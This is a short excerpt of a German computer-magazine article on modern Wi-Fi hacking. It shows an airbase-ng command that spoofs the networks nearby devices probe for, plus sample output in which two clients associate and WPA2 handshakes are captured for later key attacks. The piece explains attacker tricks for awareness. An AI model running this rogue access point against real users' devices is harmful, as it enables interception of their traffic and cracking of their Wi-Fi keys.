Die Tricks der Kriminellen

Modernes WLAN-Hacking

25.09.2012
Von Sven Blumenstein

Beispielhafte Probe-Requests

Wir zeigen eine Beispiel-Ausgabe eines Angriffs auf Endgeräte mit Airbase-NG durch die Emulation gesuchter WLANs. In der Ausgabe sind die verschiedenen Probe-Requests von zwei Clients zu sehen. Die hervorgehobenen Zeilen zeigen Aufzeichnungen von WPA2-Handshakes, die für Angriffe auf den WPA2-Schlüssel verwendet werden können.

# airbase-ng -vv -c 8 -Z 4 -W 1 -F capture mon0

16:36:30 Created tap interface at0

16:36:30 Trying to set MTU on at0 to 1500

16:36:30 Access Point with BSSID 00:C0:CA:4F:FF:FF started.

16:36:32 Got directed probe request from 10:0B:A9:76:FF:FF - "Kloster Hotel"

16:36:35 Got directed probe request from 10:0B:A9:50:FF:FF - "AndroidTether"

16:36:41 Got directed probe request from 10:0B:A9:76:FF:FF - "katze"

16:36:42 Got directed probe request from 10:0B:A9:76:FF:FF - "cirobank"

16:36:42 Got directed probe request from 10:0B:A9:76:FF:FF - "lachsfisch"

16:36:42 Got an auth request from 10:0B:A9:76:FF:FF (open system)

16:36:42 Client 10:0B:A9:76:FF:FF associated (WPA2;CCMP) to ESSID: "lachsfisch"

16:36:51 Got directed probe request from DC:2B:61:B3:FF:DD - "cirobank"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "Familie Schmidt"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "RUB-WLAN"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "Boingo Hotspot"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "WLAN FirmaXYZ"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "3A1"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "RUB-WLAN"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "2e2training"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "Hotelinternet"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "maxspot (FREE)"

16:36:52 Got directed probe request from DC:2B:61:B3:FF:DD - "evil"

16:36:57 Got an auth request from DC:2B:61:B3:FF:DD (open system)

16:36:57 Client DC:2B:61:B3:FF:DD associated (WPA2;CCMP) to ESSID: "evil"

(Computerwoche)

Zur Startseite